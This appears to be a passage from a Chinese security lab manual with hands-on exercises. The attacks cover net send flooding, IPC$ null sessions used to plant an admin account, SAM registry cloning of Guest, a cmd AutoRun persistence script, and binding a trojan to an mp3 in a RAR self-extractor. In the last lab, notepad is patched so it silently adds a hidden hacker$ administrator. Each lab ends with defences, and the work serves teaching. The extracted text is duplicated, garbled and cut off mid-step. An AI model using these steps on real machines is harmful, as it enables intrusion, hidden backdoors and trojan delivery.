網(wǎng)絡(luò)安全(黑客攻防)_腳本攻擊與后門2

1、 很多時候，我們會發(fā)現(xiàn)在自己的主機上收到一個窗口，該窗口只有一個“確定”鈕，該窗口既不能最小化也不能關(guān)閉，而且該窗口得到了操作的焦點，只能點擊“確定”，而一旦我們點擊“確定”鈕，馬上又彈出一個一模一樣的新窗口。該窗口就是死循環(huán)窗口，會消耗盡我們的內(nèi)存。這是在Windows操作系統(tǒng)默認情況下，利用了Messenger服務(wù)自動啟動的漏洞來實施攻擊的。 了解默認自動啟動的Messenger服務(wù)的安全隱患，利用該安全隱患發(fā)動攻擊。 2臺以上的Windows主機，一臺主機A為Windows 2k Server，另一臺主機B為Windows的操作系統(tǒng)(如果B機為非WIN2k的操作系統(tǒng)，需要保證“管理工具”

2、中的messenger服務(wù)為啟動狀態(tài))。1、在A主機上建立一個名為999.bat的批處理文件，具體內(nèi)容如下：:againnet send * “hello” goto again2、雙擊運行999.bat，結(jié)果是局域網(wǎng)中的所有主機均可收到死循環(huán)消息包，如圖5-1。圖5-1 局域網(wǎng)中的主機收到死循環(huán)消息包 本實驗利用Messenger服務(wù)默認自動啟動的特性，向局域網(wǎng)中的主機發(fā)死循環(huán)包，使得凡是開啟Messenger服務(wù)的主機均無法正常運行，只能收到大量的死循環(huán)消息包。 在受害機上將Messenger服務(wù)設(shè)置為禁用或停用，就收不到死循環(huán)消息包了。 IPC$(Internet Process Con

3、nection)是共享“命名管道”的資源。它是為了讓進程間相互通信而開放的命名管道，可以通過驗證用戶名和密碼獲得相應(yīng)的權(quán)限，在遠程管理計算機和查看計算機的共享資源時使用。利用IPC$，連接者甚至可以與目標主機建立一個空連接而無需用戶名與密碼(對方機器必須開啟IPC$共享，否則是連接不上的)。利用這個空連接，連接者還可以得到目標主機上的用戶列表(不過負責(zé)目標主機的管理員會禁止導(dǎo)出用戶列表的)。所謂IPC$漏洞，其實并不是真正意義上的漏洞，它是為了方便管理員的遠程管理而開放的遠程網(wǎng)絡(luò)登陸功能。它打開了默認共享，即所有的邏輯盤(C$，D$，E$)和系統(tǒng)目錄Winnt（或Windows）下的Admin

4、$。所有這些都是為了方便管理員的管理，但一些黑客會利用IPC$，訪問共享資源、導(dǎo)出用戶列表，并使用一些字典工具進行密碼探測，寄希望于獲得更高的權(quán)限，從而達到不可告人的目的。 了解默認設(shè)置的缺陷及安全隱患，掌握去掉這些安全隱患的配置方法。 2臺Windows主機，一臺Windows XP機稱為A機，另一臺為Windows 2k Server稱為B機（IP地址為192.168.0.250）。1、A機通過IPC$與B機建立連接。（1）空連接：在A機上進入DOS命令行方式，敲入net use 192.168.0.250ipc$ “”：“”。其中，192.168.0.250是B機的IP。當空連接成功建立

5、后，便可執(zhí)行如下的操作（如果空連接不能成功建立，則先轉(zhuǎn)（2）再做（1）中的，）。使用net view 192.168.0.250命令，查看B主機的共享資源，如圖52。圖52 查看B機的共享資源使用net time 192.168.0.250命令，查看B主機的當前時間，如圖53。圖53 查看B主機的當前時間使用nbtstat -a 192.168.0.250命令，得到主機B的NetBIOS用戶名列表，此命令需要B主機的NetBIOS支持，如圖54。圖54 查看B主機的NetBIOS用戶名列表（2）A主機的DOS窗口中，輸入net use 192.168.0.250ipc$ /user:admin

6、istrator命令，以管理員身份與B機建立連接。如果屏幕提示需要輸入口令，則輸入B機管理員的口令，如圖55。圖55 以管理員身份與B機相連 2、若上一步驟成功，則可以在A A機D D盤上建立一個具有如下語句的批處理文件123.cmd123.cmd（1）net user jqm /addnet user jqm /add（2）net localgroup administrators jqm net localgroup administrators jqm /add/add 3、通過網(wǎng)絡(luò)拷貝的方法將123.cmd這個批處理文件拷貝至受害主機B的C盤根目錄下。（網(wǎng)絡(luò)拷貝命令為copy d:12

7、3.cmd 192.168.0.250C$ 4、在A主機上使用at命令讓123.cmd文件在實驗機的某一指定時間運行。（1）net time 192.168.0.250（2）at 192.168.0.250 11:00 c:123.cmd，（圖56 A機上使用at命令讓B機在某一指定時間運行123.cmd文件。）。其中，11：00為程序運行時間。（3）查看程序123.cmd是否已經(jīng)在B主機上得到運行：使用at 192.168.0.250命令，如果屏幕提示清單是空的表明批處理文件已經(jīng)運行，（圖57 查看123.cmd文件是否已經(jīng)在B機上運行）。這樣，在B機上便建立一個具有超級用戶權(quán)限的名為jqm

8、的用戶帳號。 5、在A A機或者局域網(wǎng)范圍內(nèi)的其它主機上用jqmjqm的用戶身份可以與B B機以管理員權(quán)限建立連接。連接成功后，就可以像使用自己主機一樣使用B B機的命令行。 本實驗是利用Windows系統(tǒng)默認開啟的139端口（IPC$）、“Task Scheduler”服務(wù)、Lanmanserver服務(wù)(服務(wù)顯示名稱為Server)、Lanmanworkstation服務(wù)共同作用來完成的。對于黑客機來說，如果想與遠程主機建立連接（不管是否是空連接），遠程主機上的前三個服務(wù)缺一不可，黑客本機必須要開啟Lanmanworkstation服務(wù)（服務(wù)顯示名稱為Workstation）才行。（1）受害

9、主機上禁用task scheduler服務(wù)。（2）可以選擇下列方法中的任何一種，去掉IPC$。在受害主機上選擇“網(wǎng)上鄰居”，右擊-屬性-本地連接-TCP/IP-高級- “WINS”標簽卡，選擇禁用NetBIOS。對于Win2k服務(wù)器端來說，如果允許NetBIOS, 那么UDP的137、138端口, 以及TCP 的139、445端口將開放； 如果禁止NetBIOS，那么只有445端口開放，（圖58 去掉IPC$）?？梢?，如果遠程服務(wù)器沒有監(jiān)聽139或445端口，那么IPC$連接是無法建立的。受害主機的防火墻中禁用139端口。受害主機上禁用NetLogon服務(wù)（網(wǎng)絡(luò)登錄服務(wù)）。受害主機上禁用Lan

10、manserver服務(wù)（顯示名為Server），它提供了 RPC 支持、文件、打印以及命名管道共享。IPC$依賴于此服務(wù)。 注意：對于黑客機，如果未啟動Lanmanworkstation服務(wù)（它提供網(wǎng)絡(luò)連接和通訊），那么就無法向網(wǎng)絡(luò)中的其它主機發(fā)起連接請求（顯示名為Workstation）。在每臺主機上建立一個名為123.cmd的批處理文件，寫入net share IPC$ /del語句。并且把123.cmd拖入桌面上的“開始”菜單“所有程序”“啟動”中。一、實驗?zāi)康亩嶒炘O(shè)備三、實驗步驟四、實驗小結(jié)五、防御措施 眾所周知，在WindowsWindows中對某個帳號賦予權(quán)限，最好的方法是讓該

11、帳號屬于某個具有相應(yīng)權(quán)限的組。不過，這樣一來在計算機管理中是可以查看出來的。有沒有方法既能讓該帳號具有相應(yīng)組的權(quán)限，又在計算機管理中無法讓人發(fā)覺呢？克隆克隆（隱形提權(quán)）是個不錯的選擇?？寺」芾韱T帳戶是指：在計算機上使一個不屬于管理員組的帳號具有與管理員一樣的權(quán)限。本例中將GuestGuest帳號利用注冊表克隆成具有管理員權(quán)限的帳號。 了解并掌握如何對帳號進行克隆。 1臺以上的WindowsWindows操作系統(tǒng)主機，可以是Windows 2K Server/XPWindows 2K Server/XP操作系統(tǒng)。如果是win2003 SERVER，最好是正式版（否則實驗時需要將注冊表SAM鍵旁邊

12、的security鍵設(shè)置管理員帳號完全控制權(quán)限）；如果是XP，則只能是XP 的SP2以下版本。 1、找到“開始”任務(wù)欄運行regedit。打開注冊表編輯器之后依次展開HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers。注意：這里由于權(quán)限的問題,可能Sam下不會看到任何子鍵。此時在Sam鍵上點右鍵權(quán)限將Administrators的權(quán)限設(shè)置為完全控制，點“確定”后刷新一次注冊表，Sam子鍵下的內(nèi)容就會出現(xiàn)了，（圖59 注冊表中管理員帳號權(quán)限的對應(yīng)項）。Administrator對應(yīng)的項為“000001F4”，下面有兩個二進制值：一個是“F”，一個是“V”。Gu

13、est的項為“000003ee”。 2、分別將Administrator和Guest兩項導(dǎo)出，分別命名為A.reg和G.reg，（圖510 將注冊表中的某些項導(dǎo)出）。 3、用記事本將導(dǎo)出的兩個.reg文件打開，將A.reg中“F”的內(nèi)容全部復(fù)制，（圖511 復(fù)制管理員權(quán)限）所示，并且粘貼到G.reg中“F”對應(yīng)的內(nèi)容，將原G.reg中“F”的內(nèi)容全部替換掉。 4、保存G.regG.reg更改的內(nèi)容并退出。 5、雙擊G.reg，將其導(dǎo)入到注冊表當中。至此便完成了將Guest克隆成具有管理員權(quán)限的帳戶。重啟機器后便可以Guest帳戶登錄系統(tǒng)，而且在“計算機管理”中查看到Guest帳戶不屬于管理員組

14、,而且該帳戶并沒有被激活。 6、驗證：如果是一臺機，則直接注銷并以GuestGuest帳號身份登錄，發(fā)覺可以建其它用戶帳號（證明其具有管理員權(quán)限）。如果在兩臺機器上驗證，在另一臺主機上則可使用GuestGuest帳號登錄至該機，并可以在該機上遠程建立用戶帳號。 Windows Windows操作系統(tǒng)中的任何配置在注冊表中均能實現(xiàn)，本實驗恰恰驗證了這一點。在注冊表中進行克隆的GuestGuest帳號在計算機管理中無法查看出它屬于管理員組的成員，但是它的確已經(jīng)具有了管理員的權(quán)限。 計算機的使用者需要經(jīng)常查看本實驗注冊表中對應(yīng)項的設(shè)置，查看是否有被克隆的管理員帳號。 一、實驗?zāi)康亩?、實驗設(shè)備三、實驗

15、步驟四、實驗小結(jié)五、防御措施 在WindowsWindows操作系統(tǒng)默認情況下，GuestGuest帳號是禁用的?？墒呛芏鄷r候，我們會發(fā)現(xiàn)自己主機的GuestGuest帳號被莫名其妙地激活了。更為奇怪的是，我們將GuestGuest帳號設(shè)置為禁用后不久，GuestGuest帳號又處于激活狀態(tài)，即GuestGuest帳號成為了不死帳號。通過仔細研究發(fā)現(xiàn)這是因為在注冊表中將GuestGuest帳號激活語句與Cmd.exeCmd.exe程序的運行語句進行了關(guān)聯(lián)的結(jié)果。 了解并掌握注冊表在帳號激活方面的作用。 2臺WindowsWindows主機，可以是Windows 2K Windows 2K Se

16、rver Server 或或XPXP。 1、本機D D盤根目錄上建立名為123.vbs123.vbs的文件，其內(nèi)容如下： Dim wshSet wsh=CreateObject(“wscript.shell”)wsh.run “net user guest /active:yes”,0wsh.run “net user guest aaa”,0wsh.run “net localgroup administrators guest /add”,0 2、將Guest帳號的激活語句與Cmd.exe程序的運行關(guān)聯(lián)在一起：在注冊表中找到HKEY_LOCAL_MACHINESOFTWAREMicroso

17、ftCommand Processor下的AutoRun鍵，雙擊它，在鍵值中設(shè)置為d:123.vbs，關(guān)閉注冊表，（圖512 在注冊表中設(shè)置關(guān)聯(lián)操作）。說明：修改注冊表的作用是將Cmd程序與來賓帳號的激活語句進行關(guān)聯(lián)。 3、測試：運行123.vbs文件，管理員即使停用Guest帳號，但是只要在開始任務(wù)欄中運行Cmd.exe，則Guest帳號又被重新?lián)艋睢?4、推廣：此實驗可以推廣到開啟3389端口的主機上，客戶端主機將服務(wù)器端主機的GuestGuest設(shè)為不死帳號。 本實驗利用注冊表將CmdCmd命令的執(zhí)行與命令的執(zhí)行與GuestGuest帳號激活并加入管理員組的腳本文件腳本文件關(guān)聯(lián)關(guān)聯(lián)在一起

18、，使得CmdCmd命令每執(zhí)行一次，GuestGuest帳號就會被激活并具有管理員權(quán)限。 經(jīng)常檢查“計算機管理”中GuestGuest帳號的狀態(tài)，并檢查注冊表HKEY_LOCAL_MACHINHKEY_LOCAL_MACHINESOFTWAREMicrosoftCommand ProcessoESOFTWAREMicrosoftCommand ProcessorAutoRunrAutoRun下的設(shè)置。一、實驗?zāi)康亩?、實驗設(shè)備三、實驗步驟四、實驗小結(jié)五、防御措施 很多人從網(wǎng)絡(luò)中下載資源時，下載的文件是由兩個或多個初始文件綁定（指最終形成的文件在運行時，參與綁定的幾個文件也一并得到運行）形成的。將同

19、一類型的文件綁定，可以使用如“開山文件合并器”之類的軟件實現(xiàn)。如果想將兩個不同類型的文件綁定，需要使用腳本。腳本是使用一種特定的描述性語言并依據(jù)一定的格式編寫的可執(zhí)行文件。腳本通?？梢杂蓱?yīng)用程序臨時調(diào)用并執(zhí)行。將腳本文件與.zip（或者.rar）壓縮文件的自解壓特性相結(jié)合，可以實現(xiàn)將木馬與多媒體文件綁定。 掌握VBSVBS腳本的基本編寫，掌握不同文件類型的綁定方法。 1臺以上的WindowsWindows主機。我們還要準備一款木馬，一個icoico圖標文件（媒體文件或圖片文件的圖標），安裝rarrar壓縮軟件以及一個素材文件（一段動畫，一首mp3mp3，或一張圖片都可以）。 1、將用來迷惑目標

20、的素材壓縮成為123.rar文件，并將腳本文件、木馬添加其中，（圖513 壓縮所有素材）。其中，腳本文件run.vbs的代碼如下：dim shellset shell=CreateObject(“Wscript.Shell”)shell.run “cmd /c start %SystemRoot%system32123.mp3”,0WScript.Sleep 1000shell.run “cmd /c start %SystemRoot%system32setup.exe”,0注意：（1）cmd /c的含義：執(zhí)行 String 指定的命令，然后停止。（2）Start的含義：啟動另一個窗口運行指

21、定的程序或命令。 2、雙擊雙擊123.rar123.rar文件，點擊文件，點擊壓縮軟件工工具條具條上的“自解壓格式自解壓格式”鈕鈕，再選擇選擇“高高級自解壓選項級自解壓選項”，如圖514。圖514 將壓縮包進行自解壓設(shè)置 3、在“常規(guī)常規(guī)”標簽卡標簽卡中,設(shè)解壓路徑解壓路徑為%systemroot%system32%systemroot%system32，解壓后運行解壓后運行設(shè)為run.vbsrun.vbs（腳本文件），如圖515。圖515 設(shè)置“常規(guī)”標簽卡 4、在“模式模式”標簽卡中，在“安靜模式安靜模式”框架中設(shè)置框架中設(shè)置“全部隱藏全部隱藏”，在“覆蓋方式覆蓋方式”框架中設(shè)置框架中設(shè)置

22、“覆蓋所有文件覆蓋所有文件”，如圖516。圖516 設(shè)置“模式”標簽卡 5、在“文本和圖標”標簽卡中，從“文件加載自解壓圖標”中選擇圖標文件為tb.ico，如圖517。之后，會出現(xiàn)一個圖標為多媒體類型的擴展名為.exe形式的文件（名為123.exe），如圖518。圖517 設(shè)置“文本和圖標”標簽卡圖518 生成名為123.exe的文件 6、在自解壓文件的exeexe后綴前，加上其它的程序類型后綴，如.wmf.wmf和.gif.gif等。這里可以將擴展名加上.mp3.mp3，文件名變成，文件名變成123.mp3.exe123.mp3.exe，如圖519。圖519 將123.exe文件重新命名 7

23、、在“我的電腦”中找到“查看”菜單-文件夾選項-“查看”標簽卡中選擇“隱藏已知文件類型的擴展名”前的復(fù)選框，如圖520。123.mp3.exe文件變成了123.mp3文件，如圖521。圖520 將“我的電腦”恢復(fù)成默認設(shè)置圖521 123.mp3.exe的真實擴展名被隱藏 8、測試：雙擊：雙擊123.mp3123.mp3文件，在運行多媒體文件的同時，木馬文件也在運行，如圖522。圖522 測試綁定效果 本實驗通過腳本語言與壓縮包的自解壓特性相結(jié)合，實現(xiàn)了兩個不同類型（.mp3.mp3和.exe.exe）文件的綁定，利用的是系統(tǒng)默認的一些漏洞。1、將電腦由默認設(shè)置改為如下設(shè)置：雙擊桌面上“我的電

24、腦”圖標“工具”菜單文件夾選項 “查看”標簽卡將默認的“隱藏已知文件的擴展名”前的復(fù)選框去掉，如圖523。圖523 修改“我的電腦”的默認設(shè)置2、雙擊桌面上“我的電腦”圖標 “工具”菜單文件夾選項 “文件類型”標簽卡，將VBS腳本類型刪除，如圖524。圖524 刪除VBS腳本類型 很多情況下我們查看自己主機的“計算機管理”以及DOS命令行窗口時查看不到新建的用戶帳號信息，但自己的主機的確在受遠程主機的控制。其中一個原因是遠程主機在受害主機處于非安全狀態(tài)的某一時間段內(nèi)充分利用這個空檔，在受害主機上偷偷建立了后門帳號。 了解注冊表的權(quán)限設(shè)置、以及在注冊表中查看帳號、權(quán)限的方法。 2臺以上的Wind

25、owsWindows主機，操作系統(tǒng)為Windows 2K/XPWindows 2K/XP。黑客機為A A，實驗機為B B（B B機最好安裝Windows 2k Server:Windows 2k Server:如果是如果是WINDOWS 2003 SERVERWINDOWS 2003 SERVER版版, ,應(yīng)該選取應(yīng)該選取R1R1作為其補丁包作為其補丁包類型；如果是類型；如果是WINDOWS XPWINDOWS XP，應(yīng)該選取應(yīng)該選取SP2SP2以下版本作為其以下版本作為其補丁包類型；如果是補丁包類型；如果是WINDOWS2000 SERVERWINDOWS2000 SERVER則無要求則無要

26、求）。B B機開啟3389端口，而且其AdministratorAdministrator用戶名、口令已經(jīng)被黑客主機A A獲得。 1、黑客機A A以administratoradministrator身份登錄至B B機桌面（以下操作都在B B機桌面環(huán)境下運行）。 2、運行regedt32regedt32打開注冊表編輯器，選中HKEY_LOCAL_MACHINESAMSAMHKEY_LOCAL_MACHINESAMSAM右擊權(quán)限加入administratoradministrator，并將其權(quán)限設(shè)置為完全控制完全控制，再關(guān)閉注冊表窗口。 3、在“開始”任務(wù)欄中運行regeditregedit打開

27、注冊表編輯器，依次展開HKEY_LOCAL_MACHINESAMSAMDomainsAHKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersccountUsers。先查看注冊表當前有哪些用戶，其權(quán)限對應(yīng)的是哪些項?？梢钥吹絅amesNames下的administratoradministrator帳號對應(yīng)的權(quán)限為000001f4000001f4，hacker$hacker$帳號對應(yīng)的權(quán)限為000003f000003f5(5(注意在注冊表中我們新建立的注意在注冊表中我們新建立的hacker$hacker$帳號是非默認存帳號是非默認存在的用戶帳號，無論在在的用戶帳號

28、，無論在HKEY_LOCAL_MACHINESAMSAMDomHKEY_LOCAL_MACHINESAMSAMDomainsAccountNamesainsAccountNames中中hacker$hacker$排在第幾位，對應(yīng)的權(quán)限排在第幾位，對應(yīng)的權(quán)限為注冊表中為注冊表中HKEY_LOCAL_MACHINESAMSAMDomainsAccouHKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersntUsers下那些默認帳號之后的新增項下那些默認帳號之后的新增項) )，如圖525。圖525 注冊表中帳號與權(quán)限的對應(yīng)關(guān)系 4、將hacker$hacker$，00

29、0001f4000001f4，000003f5000003f5這三項導(dǎo)出并分別命名為 hacker$.reghacker$.reg，000001f4.reg000001f4.reg，000003f5.reg000003f5.reg。再用記事本對這幾個導(dǎo)出的注冊表文件進行編輯，將000001f4.reg000001f4.reg下的F F鍵值進行復(fù)制，并覆蓋000003f5.reg000003f5.reg中的F F鍵的鍵值。然后將hacker$.reghacker$.reg與000003f5.reg000003f5.reg合并至hacker$250.reghacker$250.reg。 5、DOS

30、DOS命令行下運行net user hacker$ net user hacker$ /del/del，刪除hacker$hacker$。 6、雙擊hacker$250.reghacker$250.reg，隱藏重建隱藏重建hacker$hacker$帳號。 7、運行regedt32regedt32，選中HKEY_LOCAL_MACHKEY_LOCAL_MACHINESAMSAMHINESAMSAM右擊權(quán)限去掉admiadministratornistrator的權(quán)限（權(quán)限還原為默認設(shè)置）并關(guān)閉。 8、B B機給自己的administratoradministrator帳號設(shè)置復(fù)雜口令 9、測試

31、：A A機重新以hacker$hacker$帳號連接至B B機的33893389端口，連接成功且具有管理員權(quán)限。在B B機的DOSDOS命令行、控制面板、注冊表中都無法發(fā)現(xiàn)hacker$hacker$帳號的痕跡。 微軟的操作系統(tǒng)中所做的一切操作在注冊表中都能找到配置痕跡，利用注冊表的導(dǎo)入就可以增加一個管理員權(quán)限的用戶帳號。 用戶使用主機時要經(jīng)常查看注冊表的信息，以免被黑客采用注冊表導(dǎo)入的方式隱藏建立管理員權(quán)限的用戶帳號。 平時很多人喜歡從互聯(lián)網(wǎng)上下載一些免費軟件。可是，在免費軟件安裝并運行后，發(fā)覺這些軟件的主機很容易被蠕蟲、木馬或病毒入侵，繼而成為黑客遠程控制的傀儡。這是因為絕大多數(shù)用戶安裝的

32、軟件是帶有后門的免費軟件。經(jīng)過仔細研究，可以發(fā)現(xiàn)使用這些主機的用戶在不知情的情況下，主機上增加了一些具有管理員權(quán)限的后門帳號。 所謂后門，是指程序員為了便于遠程控制某臺主機而故意留下的模塊。程序員一般不會把后門記入軟件的說明文檔，因此用戶通常無法了解后門的存在。后門帳號是指黑客利用各種手段在受害主機上偷偷建立的不易被人察覺的帳號。 免費軟件中的很多程序是黑客對正常程序進行修改之后保存生成的。以記事本程序為例，黑客可以修改正常的記事本程序，通過采用在正常的記事本程序運行之前插入建立后門帳號語句的方法來建立后門帳號。表51為反編譯環(huán)境下正常記事本程序的結(jié)構(gòu)，表52為反編譯環(huán)境下帶后門帳號的記事本程

33、序結(jié)構(gòu)?？梢?，當帶后門的記事本程序運行時，建立后門帳號的語句先執(zhí)行，記事本程序后執(zhí)行；帶后門的記事本程序在運行時除了先運行建立后門帳號的語句之外，其它語句的執(zhí)行順序和執(zhí)行結(jié)果與正常的記事本程序一樣。r1: jmp r5 (r1為入口點地址)r2: call 01006ca8r3: net user hacker$ 1234 /addr4: net localgroup administrators hacker$ /addr5: push r3call WinExecpush r4 call WinExecpush 70Push 01001888jmp r2r1 : push 70 (入口點)

34、 push 01001888r2: call 01006ca8 如果黑客使用帶有后門的記事本程序替代正常的記事本程序放入XPXP系統(tǒng)或者其它WindowsWindows系統(tǒng)的安裝包中，那么運行該安裝包的主機一旦使用被修改后的記事本程序就會出現(xiàn)這個結(jié)果：表面上記事本程序能正常運行，而實際上一個具有管理員權(quán)限的后門帳號便會在該主機上秘密地建立。一、實驗?zāi)康亩嶒炘O(shè)備三、實驗步驟四、實驗小結(jié)五、防御措施 掌握在免費程序建立后門帳號的方法，學(xué)會利用在Windows自帶的記事本程序中建立后門帳號，掌握使用免費版軟件后保證自己主機安全性的方法。 2臺WindowsWindows主機，主要在其中一臺主機A

35、 A上進行實驗，另一臺主機B B在最后測試時才會用到。（由于操作系統(tǒng)不同、補丁包不同，所以零區(qū)域可能會與教材不同，甚至有些主機只能創(chuàng)建一個用戶帳號而無法將其加入至管理員組中） 1、進入反編譯環(huán)境并加載記事本程序：使用OllyDbgOllyDbg加載%systemroot%system32%systemroot%system32目錄下的notepad.exenotepad.exe，（圖526 進入反編譯環(huán)境并加載記事本程序）。光標默認選中的第一條語句01006AE001006AE0處為程序的原入口點地址（此處相當于表51與表52中的r1），記下這個地址。并從此處起向下選五行（即將“01006AE

36、0 push 01006AE0 push 7070”，“01006AE2 push notepad.0100188801006AE2 push notepad.01001888”，“01006AE7 call notepad.01006CA801006AE7 call notepad.01006CA8”，“01006AEC xor ebx,ebx01006AEC xor ebx,ebx”，“01006AEE 01006AEE push ebxpush ebx”這幾條語句選中），復(fù)制下來。 2、尋找零區(qū)域： 至01007d7a01007d7a處，（圖527 找到零區(qū)域）。 3、建立具有管理員權(quán)限

37、的后門帳號：選中01007d7a01007d7a（此處相當于表52中的r3）至01007dca01007dca處右擊二進制編輯輸入net user hacker$ 1234 /addnet user hacker$ 1234 /add；選中01007d9801007d98（此處相當于表52中的r4）至01007db801007db8處右擊二進制編輯輸入net localgroup administrators net localgroup administrators hacker$ /add,hacker$ /add,之后再右擊之后再右擊 分析代碼。分析代碼。 4、調(diào)用系統(tǒng)函數(shù)：在01007

38、dc601007dc6處（此處相當于表52中的r5）寫上“push 01007D7Apush 01007D7A”（注意，此處不要寫成”push notepad2.01007d7a”），在01007dcb01007dcb處寫上“call call WinExecWinExec”，在01007DD001007DD0處寫上“push 01007D98push 01007D98” （注意，此處不要寫成”push notepad2. 01007DD0”）， ，在01007dd501007dd5處寫上“call call WinExecWinExec”，如圖528。圖528 調(diào)用系統(tǒng)函數(shù) 5、修改入口點語

39、句：記下第一條壓入堆棧語句的地址01007DC601007DC6，回到程序的原入口點01006AE01006AE0 0處，將原先的匯編語句修改為“jmp 01007dc6jmp 01007dc6”（因為01007dc6相當于表52中的r5，所以這條跳轉(zhuǎn)語句相當于表52中r1處的jmp r5），如圖529?？梢钥吹皆?1006ae001006ae0處處01006ae601006ae6處的語句全部被“jmp 01007dc6jmp 01007dc6”改寫了，而01006ae701006ae7處的語句保持不變，就把01006ae701006ae7處作為返回點，將其地址記錄下來（01006ae7處相當

40、于表52中的r2）。圖529 修改入口點語句 6、還原被跳轉(zhuǎn)語句破壞的記事本程序：回到01007dc601007dc6處，在01007dda01007dda處將在文件原入口處被“jmpjmp 01007dc6 01007dc6”改寫的語句填充上（在01007dda01007dda處處用push 70push 70填充，在01007ddc01007ddc處處用push 01001888push 01001888填充，在01007de101007de1處處用 jmpjmp 01006ae7 01006ae7填充），如圖530。圖530 還原被跳轉(zhuǎn)語句破壞的記事本程序 7、保存并測試：右擊復(fù)制到可執(zhí)

41、行文件右擊保存文件名為notepad2.exe 。運行notepad2.exe，我們可以發(fā)現(xiàn)屏幕出現(xiàn)記事本的界面（表明修改后的記事本程序可以正常運行）。進入“控制面板”的“用戶帳戶”，發(fā)現(xiàn)多了一個名為“hacker$”的管理員權(quán)限的用戶帳號，這便是后門帳號，如圖531。圖531 查看用戶帳戶 8、驗證：在B B機上用這個新建立的hachacker$ker$帳號身份可以與A A機進行連接。 出于節(jié)省資金的目的很多人習(xí)慣使用免費軟件，但是要注意這些軟件中可能帶有后門（尤其是后門帳號）。后門將會給使用者造成意想不到的后果即如果黑客將帶有后門帳號的程序打包，那么使用了該程序的主機就會留有后門帳號。所以

42、，用戶使用免費軟件時要注意經(jīng)常查看有無自己不認識的帳號。 用戶如果經(jīng)常使用免費版的軟件，不但需要經(jīng)常留意自己的主機上有無后門帳號，更重要的是用戶需要讓自己的主機處于一種專業(yè)的安全配置狀態(tài)。否則，該主機將很容易被黑客進行遠程控制。一、實驗?zāi)康亩?、實驗設(shè)備三、實驗步驟四、實驗小結(jié)五、防御措施 掌握在免費程序建立后門帳號的方法，學(xué)會利用在Windows自帶的計算器程序中建立后門帳號，掌握使用免費版軟件后保證自己主機安全性的方法 2臺WindowsWindows主機，主要在其中一臺主機A A上進行實驗，另一臺主機B B在最后測試時才會用到。 1、加載：在A A機上使用OllyDbgOllyDbg加載WinWindowsdows自帶的%systemroot%system32%systemroot%system32目錄下的計算器程序（即calc.execalc.exe），如圖532。光標默認選中的第一條語句0101247501012475為程序的原入口點地址，記下這個地址，并從此行起向下將“0101247